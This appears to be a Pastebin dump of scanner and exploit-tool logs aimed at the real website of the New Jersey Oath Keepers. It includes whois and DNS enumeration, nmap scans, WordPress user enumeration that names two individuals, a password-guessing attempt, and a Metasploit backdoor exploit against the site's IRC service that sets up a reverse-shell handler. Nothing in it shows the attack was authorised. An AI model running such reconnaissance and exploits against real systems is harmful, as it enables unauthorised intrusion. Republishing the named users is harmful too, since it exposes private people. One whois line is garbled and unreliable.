Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname www.njoathkeepers.org ISP Linode, LLC
- Continent North America Flag
- US
- Country United States Country Code US
- Region New Jersey Local time 15 Aug 2018 07:03 EDT
- City Newark Postal Code 07175
- IP Address 192.155.88.60 Latitude 40.736
- Longitude -74.172
- #######################################################################################################################################
- HostIP:192.155.88.60
- HostName:njoathkeepers.org
- Gathered Inet-whois information for 192.155.88.60
- ---------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 192.155.7.0 - 192.156.131.255
- netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
- descr: IPv4 address block not managed by the RIPE NCC
- remarks: ------------------------------------------------------
- remarks:
- remarks: You can find the whois server to query, or the
- remarks: IANA registry to query on this web page:
- remarks: http://www.iana.org/assignments/ipv4-address-space
- remarks:
- remarks: You can access databases of other RIRs at:
- remarks:
- remarks: AFRINIC (Africa)
- remarks: http://www.afrinic.net/ whois.afrinic.net
- remarks:
- remarks: APNIC (Asia Pacific)
- remarks: http://www.apnic.net/ whois.apnic.net
- remarks:
- remarks: ARIN (Northern America)
- remarks: http://www.arin.net/ whois.arin.net
- remarks:
- remarks: LACNIC (Latin America and the Carribean)
- remarks: http://www.lacnic.net/ whois.lacnic.net
- remarks:
- remarks: IANA IPV4 Recovered Address Space
- remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
- remarks:
- remarks: ------------------------------------------------------
- country: EU # Country is really world wide
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- status: ALLOCATED UNSPECIFIED
- mnt-by: RIPE-NCC-HM-MNT
- mnt-lower: RIPE-NCC-HM-MNT
- mnt-routes: RIPE-NCC-RPSL-MNT
- created: 2011-07-11T12:36:48Z
- last-modified: 2015-10-29T15:17:40Z
- source: RIPE
- role: Internet Assigned Numbers Authority
- address: see http://www.iana.org.
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- nic-hdl: IANA1-RIPE
- remarks: For more information on IANA services
- remarks: go to IANA web site at http://www.iana.org.
- mnt-by: RIPE-NCC-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2001-09-22T09:31:27Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.91.2 (BLAARKOP)
- Gathered Inic-whois information for njoathkeepers.org
- ---------------------------------------------------------------------------------------------------------------------------------------
- Domain Name: NJOATHKEEPERS.ORG
- Registry Domain ID: D169964607-LROR
- Registrar WHOIS Server: whois.domain.com
- Registrar URL: www.domain.com
- Updated Date: 2015-08-11T21:49:34Z
- Creation Date: 2013-10-17T12:03:14Z
- Registry Expiry Date: 2019-10-17T12:03:14Z
- Registrar Registration Expiration Date:
- Registrar: Domain.com, LLC
- Registrar IANA ID: 886
- Registrar Abuse Contact Email: compliance@domain-inc.net
- Registrar Abuse Contact Phone: +1.6022262389
- Reseller:
- Domain Status: clientTransferProhibited https://�U@icann�^-ԋ.o�rg/eppW�.U�#cU@lient]�.U�T�U@ansfe�������rProhib�U@ited
- Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
- Registrant Organization: Domain Privacy Group
- Registrant State/Province: MA
- Registrant Country: US
- Name Server: FNS1.DNSPARK.NET
- Name Server: FNS2.DNSPARK.NET
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
- >>> Last update of WHOIS database: 2018-08-15T11:09:14Z <<<
- #######################################################################################################################################
- [i] Scanning Site: http://njoathkeepers.org
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: New Jersey Oath Keepers
- [+] IP address: 192.155.88.60
- [+] Web Server: nginx/1.8.1
- [+] CMS: WordPress
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- User-agent: *
- Disallow: /calendar/action~posterboard/
- Disallow: /calendar/action~agenda/
- Disallow: /calendar/action~oneday/
- Disallow: /calendar/action~month/
- Disallow: /calendar/action~week/
- Disallow: /calendar/action~stream/
- Disallow: /calendar/action~undefined/
- Disallow: /calendar/action~http:/
- Disallow: /calendar/action~default/
- Disallow: /calendar/action~poster/
- Disallow: /calendar/action~*/
- Disallow: /*controller=ai1ec_exporter_controller*
- Disallow: /*/action~*/
- -----------[end of contents]-------------
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 301 Moved Permanently
- [i] Server: nginx/1.8.1
- [i] Date: Wed, 15 Aug 2018 11:10:46 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] Connection: close
- [i] X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
- [i] Set-Cookie: PHPSESSID=fbtfmkufunnmt946lelrsv8ub0; path=/
- [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
- [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- [i] Pragma: no-cache
- [i] Location: http://www.njoathkeepers.org/
- [i] HTTP/1.1 200 OK
- [i] Server: nginx/1.8.1
- [i] Date: Wed, 15 Aug 2018 11:10:48 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] Connection: close
- [i] X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
- [i] Set-Cookie: PHPSESSID=r2i1hr7bp01g7fbms8a3u8btb3; path=/
- [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
- [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- [i] Pragma: no-cache
- [i] Link: <http://www.njoathkeepers.org/wp-json/>; rel="https://api.w.org/"
- [i] Link: <http://www.njoathkeepers.org/>; rel=shortlink
- #######################################################################################################################################
- [?] Enter the target: http://www.njoathkeepers.org/
- [!] IP Address : 192.155.88.60
- [!] Server: nginx/1.8.1
- [!] Powered By: PHP/5.5.38-1~dotdeb+7.1
- [+] Clickjacking protection is not in place.
- [!] CMS Detected : WordPress
- [?] Would you like to use WPScan? [Y/n] Y
- [+] URL: http://www.njoathkeepers.org/
- [+] Started: Wed Aug 15 07:10:28 2018
- [+] Interesting header: LINK: <http://www.njoathkeepers.org/wp-json/>; rel="https://api.w.org/"
- [+] Interesting header: LINK: <http://www.njoathkeepers.org/>; rel=shortlink
- [+] Interesting header: SERVER: nginx/1.8.1
- [+] Interesting header: X-POWERED-BY: PHP/5.5.38-1~dotdeb+7.1
- [+] robots.txt available under: http://www.njoathkeepers.org/robots.txt [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/*/action~*/ [HTTP 404]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/*controller=ai1ec_exporter_controller* [HTTP 404]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~*/ [HTTP 404]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~agenda/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~default/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~http:/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~month/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~oneday/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~poster/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~posterboard/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~stream/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~undefined/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~week/ [HTTP 200]
- [+] XML-RPC Interface available under: http://www.njoathkeepers.org/xmlrpc.php [HTTP 405]
- [+] API exposed: http://www.njoathkeepers.org/wp-json/ [HTTP 200]
- [!] 2 users exposed via API: http://www.njoathkeepers.org/wp-json/wp/v2/users
- +----+---------------+----------------------------------------------+
- | ID | Name | URL |
- +----+---------------+----------------------------------------------+
- | 1 | Adam Kosmin | http://www.njoathkeepers.org/author/akosmin/ |
- | 2 | Edward Durfee | http://www.njoathkeepers.org/author/stepman/ |
- +----+---------------+----------------------------------------------+
- [+] Found an RSS Feed: http://www.njoathkeepers.org/feed/ [HTTP 200]
- [+] Enumerating WordPress version ...
- [+] WordPress version 4.9.8 (Released on 2018-08-02) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
- [+] WordPress theme in use: njoathkeepers - v3.0
- [+] Name: njoathkeepers - v3.0
- | Location: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/
- | Readme: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/readme.txt
- | Style URL: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/style.css
- | Theme Name: njoathkeepers
- | Theme URI: http://www.dizzain.com/blog/freebies/free-wordpress-theme-drochilli/
- | Description: Minimalistic darken WordPress theme with two columns, left-sidebar, fluid width and widget-ready.
- | Author: Dizzain Inc.
- | Author URI: http://www.dizzain.com/
- [+] Enumerating plugins from passive detection ...
- | 6 plugins found:
- [+] Name: all-in-one-event-calendar - v2.5.32
- | Latest version: 2.5.32 (up to date)
- | Last updated: 2018-08-03T20:07:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/readme.txt
- [+] Name: contact-form-7 - v5.0.3
- | Latest version: 5.0.3 (up to date)
- | Last updated: 2018-07-12T12:37:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/readme.txt
- [+] Name: email-subscribers - v3.5.4
- | Last updated: 2018-08-09T05:23:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/readme.txt
- | Changelog: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/changelog.txt
- [!] The version is out of date, the latest version is 3.5.6
- [+] Name: login-sidebar-widget - v5.7.9
- | Latest version: 5.7.9 (up to date)
- | Last updated: 2018-07-27T17:19:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/readme.txt
- [+] Name: pta-member-directory - v1.6.9
- | Latest version: 1.6.9 (up to date)
- | Last updated: 2017-09-18T01:17:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/readme.txt
- [+] Name: taskfreak - v1.0.19
- | Latest version: 1.0.19 (up to date)
- | Last updated: 2016-08-11T06:51:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/taskfreak/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/taskfreak/readme.txt
- [+] Finished: Wed Aug 15 07:11:50 2018
- [+] Elapsed time: 00:01:21
- [+] Requests made: 113
- [+] Memory used: 118.371 MB
- [-] Honeypot Probabilty: 50%
- ----------------------------------------
- [~] Trying to gather whois information for www.njoathkeepers.org
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/www.njoathkeepers.org
- ----------------------------------------
- [+] Robots.txt retrieved
- User-agent: *
- Disallow: /wp-admin/
- Allow: /wp-admin/admin-ajax.php
- Disallow: /calendar/action~posterboard/
- Disallow: /calendar/action~agenda/
- Disallow: /calendar/action~oneday/
- Disallow: /calendar/action~month/
- Disallow: /calendar/action~week/
- Disallow: /calendar/action~stream/
- Disallow: /calendar/action~undefined/
- Disallow: /calendar/action~http:/
- Disallow: /calendar/action~default/
- Disallow: /calendar/action~poster/
- Disallow: /calendar/action~*/
- Disallow: /*controller=ai1ec_exporter_controller*
- Disallow: /*/action~*/
- ---------------------------------------------------------------------------------------------------------------------------------------
- API count exceeded - Increased quota available with membership
- --------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- [+] Host Records (A)
- www.njoathkeepers.orgHTTP: (mail.nycpatriot.org) (192.155.88.60) AS63949 Linode, LLC United States
- [+] TXT Records
- [+] DNS Map: https://dnsdumpster.com/static/map/njoathkeepers.org.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- No emails found
- No hosts found
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Crawling the target for fuzzable URLs
- [+] Found 2 fuzzable URLs
- http://www.njoathkeepers.org//webcal://www.njoathkeepers.org/?plugin=all-in-one-event-calendar&controller=ai1ec_exporter_controller&action=export_events&no_html=true
- [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- njoathkeepers.org -----
- Host's addresses:
- __________________
- njoathkeepers.org. 3589 IN A 192.155.88.60
- Name Servers:
- ______________
- fns1.dnspark.net. 3586 IN A 66.55.82.13
- fns2.dnspark.net. 46 IN A 192.184.90.32
- Mail (MX) Servers:
- ___________________
- mail.yourhostingaccount.com. 3600 IN A 65.254.254.52
- mail.yourhostingaccount.com. 3600 IN A 65.254.254.50
- mail.yourhostingaccount.com. 3600 IN A 65.254.254.58
- mail.yourhostingaccount.com. 3600 IN A 65.254.254.53
- mail.yourhostingaccount.com. 3600 IN A 65.254.254.55
- mail.yourhostingaccount.com. 3600 IN A 65.254.254.54
- mail.yourhostingaccount.com. 3600 IN A 65.254.254.57
- mail.yourhostingaccount.com. 3600 IN A 65.254.254.56
- mail.yourhostingaccount.com. 3600 IN A 65.254.254.51
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for njoathkeepers.org on fns1.dnspark.net ...
- Trying Zone Transfer for njoathkeepers.org on fns2.dnspark.net ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-15 07:07 EDT
- Nmap scan report for njoathkeepers.org (192.155.88.60)
- Host is up (0.071s latency).
- rDNS record for 192.155.88.60: mail.nycpatriot.org
- Not shown: 460 closed ports, 6 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 143/tcp open imap
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 3333/tcp open dec-notes
- 5554/tcp open sgi-esphttp
- 6667/tcp open irc
- 7777/tcp open cbt
- 8001/tcp open vcom-tunnel
- Nmap done: 1 IP address (1 host up) scanned in 3.62 seconds
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-15 07:07 EDT
- Nmap scan report for njoathkeepers.org (192.155.88.60)
- Host is up (0.14s latency).
- rDNS record for 192.155.88.60: mail.nycpatriot.org
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open ntp
- 137/udp open|filtered netbios-ns
- 138/udp open|filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Nmap done: 1 IP address (1 host up) scanned in 4.01 seconds
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://njoathkeepers.org
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- http://njoathkeepers.org [301 Moved Permanently] Cookies[PHPSESSID], Country[UNITED STATES][US], HTTPServer[nginx/1.8.1], IP[192.155.88.60], PHP[5.5.38-1~dotdeb+7.1], RedirectLocation[http://www.njoathkeepers.org/], X-Powered-By[PHP/5.5.38-1~dotdeb+7.1], nginx[1.8.1]
- http://www.njoathkeepers.org/ [200 OK] Cookies[PHPSESSID], Country[UNITED STATES][US], HTTPServer[nginx/1.8.1], IP[192.155.88.60], JQuery[1.12.4], MetaGenerator[WordPress 4.9.8], PHP[5.5.38-1~dotdeb+7.1], Script[text/javascript], Title[New Jersey Oath Keepers], UncommonHeaders[link], WordPress[4.9.8], X-Powered-By[PHP/5.5.38-1~dotdeb+7.1], nginx[1.8.1]
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://www.njoathkeepers.org...
- _______________________________ SITE INFO _______________________________
- IP Title
- 192.155.88.60 New Jersey Oath Keepers
- ________________________________ VERSION ________________________________
- Name Versions Type
- WordPress 4.9.8 CMS
- PHP 5.5.38-1~dotdeb+7.1 Platform
- nginx 1.8.1 Platform
- jQuery 2.0.0 JavaScript
- FreeBSD 10 | 11 OS
- openSUSE tumbleweed OS
- ______________________________ INTERESTING ______________________________
- URL Note Type
- /wp-login.php Wordpress login page Interesting
- /readme.html Readme file Interesting
- /robots.txt robots.txt index Interesting
- /login/ Login Page Interesting
- _________________________________ TOOLS _________________________________
- Name Link Software
- wpscan https://github.com/wpscanteam/wpscan WordPress
- CMSmap https://github.com/Dionach/CMSmap WordPress
- _________________________________________________________________________
- Time: 45.5 sec Urls: 215 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 301 Moved Permanently
- Server: nginx/1.8.1
- Date: Wed, 15 Aug 2018 11:09:11 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
- Set-Cookie: PHPSESSID=p19uh5ol7fu2tmld5oa63cc504; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Location: http://www.njoathkeepers.org/
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-15 07:09 EDT
- Nmap scan report for njoathkeepers.org (192.155.88.60)
- Host is up (0.27s latency).
- rDNS record for 192.155.88.60: mail.nycpatriot.org
- PORT STATE SERVICE VERSION
- 6667/tcp open irc BitlBee IRCd
- | irc-botnet-channels:
- |_ &bitlbee
- | irc-sasl-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 12 guesses in 157 seconds, average tps: 0.1
- |_ ERROR: The service seems to have failed or is heavily firewalled...
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP|general purpose
- Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (93%)
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
- Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (93%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- Service Info: Host: :mail.nycpatriot.org
- TRACEROUTE (using port 6667/tcp)
- HOP RTT ADDRESS
- 1 378.73 ms mail.nycpatriot.org (192.155.88.60)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 199.67 seconds
- +-------------------------------------------------------+
- | METASPLOIT by Rapid7 |
- +---------------------------+---------------------------+
- | __________________ | |
- | ==c(______(o(______(_() | |""""""""""""|======[*** |
- | )=\ | | EXPLOIT \ |
- | // \\ | |_____________\_______ |
- | // \\ | |==[msf >]============\ |
- | // \\ | |______________________\ |
- | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
- | // \\ | ********************* |
- +---------------------------+---------------------------+
- | o O o | \'\/\/\/'/ |
- | o O | )======( |
- | o | .' LOOT '. |
- | |^^^^^^^^^^^^^^|l___ | / _||__ \ |
- | | PAYLOAD |""\___, | / (_||_ \ |
- | |________________|__|)__| | | __||_) | |
- | |(@)(@)"""**|(@)(@)**|(@) | " || " |
- | = = = = = = = = = = = = | '--------------' |
- +---------------------------+---------------------------+
- =[ metasploit v4.17.3-dev ]
- + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
- + -- --=[ 538 payloads - 41 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- RHOST => njoathkeepers.org
- RHOSTS => njoathkeepers.org
- [*] Started reverse TCP double handler on 10.211.1.133:4444
- [*] njoathkeepers.org:6667 - Connected to njoathkeepers.org:6667...
- :mail.nycpatriot.org NOTICE * :BitlBee-IRCd initialized, please go on
- [*] njoathkeepers.org:6667 - Sending backdoor command...
- [*] Exploit completed, but no session was created.
- #######################################################################################################################################
- I, [2018-08-15T07:13:46.645155 #22642] INFO -- : Initiating port scan
- I, [2018-08-15T07:17:06.865973 #22642] INFO -- : Using nmap scan output file logs/nmap_output_2018-08-15_07-13-46.xml
- I, [2018-08-15T07:17:06.887563 #22642] INFO -- : Discovered open port: 192.155.88.60:465
- I, [2018-08-15T07:17:08.534153 #22642] INFO -- : Discovered open port: 192.155.88.60:993
- W, [2018-08-15T07:17:10.172522 #22642] WARN -- : Yasuo did not find any potential hosts to enumerate
- #######################################################################################################################################
- [*] Processing domain njoathkeepers.org
- [+] Getting nameservers
- 192.184.90.32 - fns2.dnspark.net
- 66.55.82.13 - fns1.dnspark.net
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 include:servers.mcsv.net ?all"
- [+] MX records found, added to target list
- 0 mail.yourhostingaccount.com.
- [*] Scanning njoathkeepers.org for A records
- 192.155.88.60 - njoathkeepers.org
- 192.155.88.60 - www.njoathkeepers.org
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 192.155.88.60 200 host www.njoathkeepers.org nginx/1.8.1
- #######################################################################################################################################
- Original* njoathkeepers.org 192.155.88.60 NS:fns1.dnspark.net MX:mail.yourhostingaccount.com
- Subdomain njoat.hkeepers.org -
- Subdomain njoath.keepers.org 69.172.201.153 NS:ns1.uniregistrymarket.link
- Subdomain njoathkee.pers.org 185.53.178.6 NS:ns1.parkingcrew.net MX:mail.h-email.net
- Subdomain njoathkeeper.s.org 50.63.46.1 NS:A.SERVICE.AFILIASDNS.INFO
- #######################################################################################################################################
- [i] The remote host tried to redirect to: http://www.njoathkeepers.org/
- [?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N] >Y
- [+] URL: http://www.njoathkeepers.org/
- [+] Started: Wed Aug 15 07:09:40 2018
- [+] Interesting header: LINK: <http://www.njoathkeepers.org/wp-json/>; rel="https://api.w.org/"
- [+] Interesting header: LINK: <http://www.njoathkeepers.org/>; rel=shortlink
- [+] Interesting header: SERVER: nginx/1.8.1
- [+] Interesting header: X-POWERED-BY: PHP/5.5.38-1~dotdeb+7.1
- [+] robots.txt available under: http://www.njoathkeepers.org/robots.txt [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/*/action~*/ [HTTP 404]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/*controller=ai1ec_exporter_controller* [HTTP 404]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~*/ [HTTP 404]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~agenda/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~default/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~http:/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~month/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~oneday/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~poster/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~posterboard/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~stream/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~undefined/ [HTTP 200]
- [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~week/ [HTTP 200]
- [+] XML-RPC Interface available under: http://www.njoathkeepers.org/xmlrpc.php [HTTP 405]
- [+] API exposed: http://www.njoathkeepers.org/wp-json/ [HTTP 200]
- [!] 2 users exposed via API: http://www.njoathkeepers.org/wp-json/wp/v2/users
- +----+---------------+----------------------------------------------+
- | ID | Name | URL |
- +----+---------------+----------------------------------------------+
- | 1 | Adam Kosmin | http://www.njoathkeepers.org/author/akosmin/ |
- | 2 | Edward Durfee | http://www.njoathkeepers.org/author/stepman/ |
- +----+---------------+----------------------------------------------+
- [+] Found an RSS Feed: http://www.njoathkeepers.org/feed/ [HTTP 200]
- [+] Enumerating WordPress version ...
- [+] WordPress version 4.9.8 (Released on 2018-08-02) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
- [+] WordPress theme in use: njoathkeepers - v3.0
- [+] Name: njoathkeepers - v3.0
- | Location: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/
- | Readme: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/readme.txt
- | Style URL: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/style.css
- | Theme Name: njoathkeepers
- | Theme URI: http://www.dizzain.com/blog/freebies/free-wordpress-theme-drochilli/
- | Description: Minimalistic darken WordPress theme with two columns, left-sidebar, fluid width and widget-ready.
- | Author: Dizzain Inc.
- | Author URI: http://www.dizzain.com/
- [+] Enumerating plugins from passive detection ...
- | 6 plugins found:
- [+] Name: all-in-one-event-calendar - v2.5.32
- | Latest version: 2.5.32 (up to date)
- | Last updated: 2018-08-03T20:07:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/readme.txt
- [+] Name: contact-form-7 - v5.0.3
- | Latest version: 5.0.3 (up to date)
- | Last updated: 2018-07-12T12:37:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/readme.txt
- [+] Name: email-subscribers - v3.5.4
- | Last updated: 2018-08-09T05:23:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/readme.txt
- | Changelog: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/changelog.txt
- [!] The version is out of date, the latest version is 3.5.6
- [+] Name: login-sidebar-widget - v5.7.9
- | Latest version: 5.7.9 (up to date)
- | Last updated: 2018-07-27T17:19:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/readme.txt
- [+] Name: pta-member-directory - v1.6.9
- | Latest version: 1.6.9 (up to date)
- | Last updated: 2017-09-18T01:17:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/readme.txt
- [+] Name: taskfreak - v1.0.19
- | Latest version: 1.0.19 (up to date)
- | Last updated: 2016-08-11T06:51:00.000Z
- | Location: http://www.njoathkeepers.org/wp-content/plugins/taskfreak/
- | Readme: http://www.njoathkeepers.org/wp-content/plugins/taskfreak/readme.txt
- [+] Finished: Wed Aug 15 07:11:13 2018
- [+] Elapsed time: 00:01:32
- [+] Requests made: 115
- [+] Memory used: 98.434 MB
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: njoathkeepers.org
- [-] DNSSEC is not configured for njoathkeepers.org
- [*] SOA fns1.dnspark.net 66.55.82.13
- [*] NS fns1.dnspark.net 66.55.82.13
- [*] NS fns1.dnspark.net 2001:1850:1:0:107::d
- [*] NS fns2.dnspark.net 192.184.90.32
- [*] Bind Version for 192.184.90.32 DNS
- [*] NS fns2.dnspark.net 2604:180:1::f02f:2c21
- [*] Bind Version for 2604:180:1::f02f:2c21 DNS
- [*] MX mail.yourhostingaccount.com 65.254.254.52
- [*] MX mail.yourhostingaccount.com 65.254.254.50
- [*] MX mail.yourhostingaccount.com 65.254.254.58
- [*] MX mail.yourhostingaccount.com 65.254.254.53
- [*] MX mail.yourhostingaccount.com 65.254.254.55
- [*] MX mail.yourhostingaccount.com 65.254.254.54
- [*] MX mail.yourhostingaccount.com 65.254.254.57
- [*] MX mail.yourhostingaccount.com 65.254.254.56
- [*] MX mail.yourhostingaccount.com 65.254.254.51
- [*] A njoathkeepers.org 192.155.88.60
- [*] TXT njoathkeepers.org v=spf1 include:servers.mcsv.net ?all
- [*] Enumerating SRV Records
- [-] No SRV Records Found for njoathkeepers.org
- [+] 0 Records Found
- #######################################################################################################################################
- =======================================================================================================================================
- Hosts 12
- DNS Records 16
- Subdomains 1
- Hosts (12)
- =======================================================================================================================================
- 65.254.254.50
- 65.254.254.51
- 65.254.254.52
- 65.254.254.53
- 65.254.254.54
- 65.254.254.55
- 65.254.254.56
- 65.254.254.57
- 65.254.254.58
- 66.55.82.13
- 192.155.88.60
- 192.184.90.32
- DNS Records (16)
- =======================================================================================================================================
- njoathkeepers.org A 192.155.88.60
- mail.yourhostingaccount.com MX 65.254.254.50
- mail.yourhostingaccount.com MX 65.254.254.51
